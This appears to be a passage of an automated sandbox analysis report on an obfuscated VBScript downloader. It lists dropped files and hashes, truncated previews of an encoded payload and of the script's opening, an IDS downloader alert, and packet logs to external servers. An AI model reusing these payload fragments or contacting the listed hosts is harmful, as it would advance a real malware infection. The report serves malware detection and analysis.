                                                                              SHA-512:6AE77CDFB10037C25654DAF74D27F00E555221FB251289A2AEE1AE9E971B76471E2DFD24B1B0CFD6F9C9C6F7C79C227C715130B40CBBC36A7CC675EC139027FB
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1852
                                                                              Entropy (8bit):5.522052452242155
                                                                              Encrypted:false
                                                                              SSDEEP:48:/dWzSU4y4RQmTpoUeCa+m9qr9tK8NfhGn1FUl57f+dAVwz2E:/dW2HyIFTmLz9qr2KfhaIfjLVC
                                                                              MD5:14F07818505DDC9FDF3DD3192661AAC1
                                                                              SHA1:BA932E59C948D84331FDE722B926473A8FE18DA2
                                                                              SHA-256:CB9085E349ADFBDB88C026ECEA45D53D989A41DCF5878DA82F3CC591810844D1
                                                                              SHA-512:040674E0B2C28EE4E7D909ED558EC268243DB3E47EE6A51BA9E0A202F743DC51B42BA4EBFB8F07F167B0C06789BE90BDDDE3E67CF541F9AA18DF21EEFE7824D8
                                                                              Malicious:false
                                                                              Preview:@...e...........z....................................@..........\.................8....E...U..........2.Microsoft.BackgroundIntelligentTransfer.Management..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.Po

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oim2sg3.bsw.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b25ugmmv.whp.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ck202jc0.bsk.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_req1kcmc.n23.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Roaming\BIT7E81.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):418368
                                                                              Entropy (8bit):5.942959938550705
                                                                              Encrypted:false
                                                                              SSDEEP:12288:h7A94nB0+wCEc5lvaPy1Uq91pHgxq/Oer/D:G4nB0yEc5lvaj0exUjD
                                                                              MD5:542DEAD508321F2C572B8AB1F5F0A193
                                                                              SHA1:77776BC06C4F80E7CD454277A35A8BAA48D6AF85
                                                                              SHA-256:1E18BF7FF5767B7D3A370A1B667C5A9117CBE1A85765053B6FF2E53FD6CC7795
                                                                              SHA-512:04F2BFA6EA52DAFE52FD6FFA622DDEEDAA2BC936F3E0D3372ED64DBA0556889541490A173285E9B5209555043C8389A9A803EC5EE143344D4129A40F6BAD07FF
                                                                              Malicious:false
                                                                              Preview:6wL5mHEBm7uqAhwA6wKIe3EBmwNcJARxAZvrAiVOuS142F5xAZvrAojZgemto58IcQGbcQGbgemA1DhWcQGb6wJFkusCmT9xAZu65vzCJusCl7rrAlga6wJ0a3EBmzHKcQGbcQGbiRQLcQGb6wLKidHicQGbcQGbg8EE6wKyh3EBm4H5FgB+A3zNcQGb6wL3NYtEJARxAZvrAj0NicPrAuJKcQGbgcPvW+YA6wKdoOsCpLC6tOrZiOsCrcfrAkdhgcK5Qtxk6wIhhesCTwaBwpPSSRLrAqxBcQGb6wKcousCevxxAZvrAoHUiwwQ6wIn3XEBm4kME3EBm+sCstpCcQGb6wJGdIH6XG4EAHXV6wJqvnEBm4lcJAxxAZvrAjgPge0AAwAA6wL+CXEBm4tUJAhxAZvrAipUi3wkBHEBm+sCH3uJ63EBm+sCS3mBw5wAAABxAZvrAmJ8U3EBm3EBm2pAcQGb6wKEcYnr6wI0eusCHV3HgwABAAAAEJ0DcQGb6wLrvoHDAAEAAOsCcCrrAneVU+sCKvhxAZuJ63EBm3EBm4m7BAEAAOsCVVtxAZuBwwQBAABxAZtxAZtT6wLvaHEBm2r/6wInQesCZ1aDwgXrAujU6wLlGzH2cQGbcQGbMclxAZtxAZuLGusCvmXrArr8QesC+03rAtL1ORwKdfLrAhZS6wIaeUbrAnnU6wIm3oB8Cvu4ddpxAZvrAqw4i0QK/OsCvd7rAvnuKfDrAq67cQGb/9JxAZtxAZu6XG4EAOsCQApxAZsxwOsCVKfrAuNmi3wkDOsCCmLrAm8TgTQHUlJDCusCKpnrAj8Rg8AE6wLJzOsCHC050HXicQGb6wLrpon7cQGb6wKgz//X6wJhGnEBm9u3hI9yrbz1tJ12eNPnY/WtrdkOj/PCj3KtvPUfidYW09dj9a2tdFbTXQ/133K89a0ntF/bt/oRKiLobKWRdsHSqCKLo7zB4ozTsmcEhG+Omdati6PS70QL

                                                                              C:\Users\user\AppData\Roaming\Inte.reg (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):418368
                                                                              Entropy (8bit):5.942959938550705
                                                                              Encrypted:false
                                                                              SSDEEP:12288:h7A94nB0+wCEc5lvaPy1Uq91pHgxq/Oer/D:G4nB0yEc5lvaj0exUjD
                                                                              MD5:542DEAD508321F2C572B8AB1F5F0A193
                                                                              SHA1:77776BC06C4F80E7CD454277A35A8BAA48D6AF85
                                                                              SHA-256:1E18BF7FF5767B7D3A370A1B667C5A9117CBE1A85765053B6FF2E53FD6CC7795
                                                                              SHA-512:04F2BFA6EA52DAFE52FD6FFA622DDEEDAA2BC936F3E0D3372ED64DBA0556889541490A173285E9B5209555043C8389A9A803EC5EE143344D4129A40F6BAD07FF
                                                                              Malicious:false
                                                                              Preview:6wL5mHEBm7uqAhwA6wKIe3EBmwNcJARxAZvrAiVOuS142F5xAZvrAojZgemto58IcQGbcQGbgemA1DhWcQGb6wJFkusCmT9xAZu65vzCJusCl7rrAlga6wJ0a3EBmzHKcQGbcQGbiRQLcQGb6wLKidHicQGbcQGbg8EE6wKyh3EBm4H5FgB+A3zNcQGb6wL3NYtEJARxAZvrAj0NicPrAuJKcQGbgcPvW+YA6wKdoOsCpLC6tOrZiOsCrcfrAkdhgcK5Qtxk6wIhhesCTwaBwpPSSRLrAqxBcQGb6wKcousCevxxAZvrAoHUiwwQ6wIn3XEBm4kME3EBm+sCstpCcQGb6wJGdIH6XG4EAHXV6wJqvnEBm4lcJAxxAZvrAjgPge0AAwAA6wL+CXEBm4tUJAhxAZvrAipUi3wkBHEBm+sCH3uJ63EBm+sCS3mBw5wAAABxAZvrAmJ8U3EBm3EBm2pAcQGb6wKEcYnr6wI0eusCHV3HgwABAAAAEJ0DcQGb6wLrvoHDAAEAAOsCcCrrAneVU+sCKvhxAZuJ63EBm3EBm4m7BAEAAOsCVVtxAZuBwwQBAABxAZtxAZtT6wLvaHEBm2r/6wInQesCZ1aDwgXrAujU6wLlGzH2cQGbcQGbMclxAZtxAZuLGusCvmXrArr8QesC+03rAtL1ORwKdfLrAhZS6wIaeUbrAnnU6wIm3oB8Cvu4ddpxAZvrAqw4i0QK/OsCvd7rAvnuKfDrAq67cQGb/9JxAZtxAZu6XG4EAOsCQApxAZsxwOsCVKfrAuNmi3wkDOsCCmLrAm8TgTQHUlJDCusCKpnrAj8Rg8AE6wLJzOsCHC050HXicQGb6wLrpon7cQGb6wKgz//X6wJhGnEBm9u3hI9yrbz1tJ12eNPnY/WtrdkOj/PCj3KtvPUfidYW09dj9a2tdFbTXQ/133K89a0ntF/bt/oRKiLobKWRdsHSqCKLo7zB4ozTsmcEhG+Omdati6PS70QL

                                                                              Static File Info

                                                                              General

                                                                              File type:ASCII text, with CRLF line terminators
                                                                              Entropy (8bit):5.307978556733029
                                                                              TrID:
                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                              File name:tmkSAOF3GM.vbs
                                                                              File size:14'967 bytes
                                                                              MD5:3b95d9711bf763678d21b1bdaacc2981
                                                                              SHA1:0ba3540093886e7f97d41bcd0991f24e7c7853ed
                                                                              SHA256:25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f
                                                                              SHA512:2067fa3dd85d8fd9dd588f9dc17a5afdda941bea45969aa7e7e575cfccd5110039450f89e407e7db4c3e8f203c7c13e06dad0905f9e87433ba6debd5654b8def
                                                                              SSDEEP:384:Cavd0J888D0S/DI7wjHkNIW7Qh4zkwQ4aC:CaJD0S/im/WnBiC
                                                                              TLSH:E762C55553DE2D3DC9433A3DCD7999066E708D49F11330D87B22BAAF20636A843D8AD7
                                                                              File Content Preview:Function Lixene(Oprustningsvanviddet,kirkefestenunconfoun,forestishcathopsygep)..If Oprustningsvanviddet = "Traktatbruddets" Then ....Middleburyfastholdelse = Trim("Nurl") ....End If..If kirkefestenunconfoun = cstr(893638) Then ....Set Bjlenaalensolsikk =

                                                                              File Icon

                                                                              Icon Hash:68d69b8f86ab9a86

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-19T12:38:03.679602+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749781103.120.177.150443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 19, 2024 12:37:32.319242001 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:32.319294930 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:32.319396973 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:32.321391106 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:32.321420908 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:33.651288033 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:33.651361942 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:33.654515028 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:33.654529095 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:33.654858112 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:33.696244955 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:33.739327908 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.098350048 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.098611116 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.098632097 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.098640919 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.098907948 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.098963976 CET44349711107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.099021912 CET49711443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.134830952 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.134876966 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:34.135030985 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.135162115 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:34.135173082 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.389702082 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.391871929 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:35.391983032 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.392993927 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:35.393018007 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.840400934 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.895494938 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:35.964791059 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964804888 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964859009 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964884043 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964910984 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964930058 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:35.964977980 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:35.964996099 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:35.965025902 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.077517033 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.077543974 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.077603102 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.077657938 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.077676058 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.077702045 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.124583006 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.124605894 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.124677896 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.124731064 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.124747992 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.124774933 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.243696928 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.243726015 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.243849993 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.243940115 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.244009018 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.271636963 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.271662951 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.271881104 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.271939993 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.271995068 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.294085026 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.294111013 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.294176102 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.294203997 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.294246912 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.320144892 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.320167065 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.320365906 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.320446014 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.320532084 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.431540966 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.431566954 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.431637049 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.431677103 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.431705952 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.431736946 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.448298931 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.448323965 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.448390007 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.448409081 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.448456049 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.448494911 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.466229916 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.466259003 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.466377974 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.466403008 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.466469049 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.484159946 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.484186888 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.484297991 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.484313011 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.484378099 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.502029896 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.502048016 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.502151966 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.502171040 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.502212048 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.538423061 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.538451910 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.538584948 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.538618088 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.538666010 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.616792917 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.616864920 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.616930008 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.617031097 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.617070913 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.617094994 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.629893064 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.629957914 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.630017996 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.630043983 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.630074024 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.630096912 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.641288042 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.641324043 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.641381979 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.641403913 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.641422033 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.641480923 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.654539108 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.654567957 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.654628992 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.654650927 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.654680967 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.654704094 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.664742947 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.664768934 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.664886951 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.664896011 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.664941072 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.671912909 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.671933889 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.672020912 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.672028065 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.672069073 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.679349899 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.679373026 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.679449081 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.679455996 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.679511070 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.685894966 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.685914040 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.686044931 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.686052084 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.686101913 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.808104992 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.808136940 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.808247089 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.808280945 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.808326960 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.813972950 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.813990116 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.814073086 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.814095974 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.814166069 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.820734978 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.820753098 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.820835114 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.820862055 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.820903063 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.827533007 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.827553034 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.827685118 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.827708006 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.827749968 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.830636978 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.830702066 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.830734015 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.830777884 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.830912113 CET49717443192.168.2.7107.161.23.150
                                                                              Dec 19, 2024 12:37:36.830934048 CET44349717107.161.23.150192.168.2.7
                                                                              Dec 19, 2024 12:37:36.830945969 CET49717443192.168.2.7107.161.23.150
